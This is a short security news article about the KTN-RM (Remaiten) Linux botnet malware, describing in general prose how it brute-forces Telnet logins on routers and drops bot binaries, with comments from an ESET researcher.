Dubbed KTN-Remastered or KTN-RM, the malware is a combination of both Tsunami (or Kaiten) as well as Gafgyt.
Tsunami is a well-known IRC (Internet Relay Chat) bot used by miscreants for launching Distributed Denial of Service (DDoS) attacks while Gafgyt is used for Telnet scanning.
KTN-RM, which researcher dubbed 'Remaiten,' features an improved spreading mechanism by carrying downloader executable binaries for embedded platforms and other connected devices.
How Does the Linux Malware Work?
The malware first performs Telnet scanning to look for routers and smart devices. Once the connection is made, the malware tries to guess the login credentials in an effort to take over weakly-secured devices.
If it successfully logs in, the malware will issue a shell command to download bot executable files for multiple system architectures before running them on the compromised networking kit.
"This is a simple but noisy way of ensuring that the new victim gets infected because it is likely that one of the binaries is for the current platform," explained ESET Malware Researcher Michal Malík. "It targets mainly those with weak login credentials."
The malware, version 2.0, also has a welcome message for those who might try to neutralise its threat, containing a reference to the Malware Must Die blog.
Perhaps it is a way to take revenge, as Malware Must Die has published extensive details about Gafgyt, Tsunami and other members of this Malware family.
For more technical details about KTN-RM or Remaiten, you can head on to ESET's official blog post published Wednesday.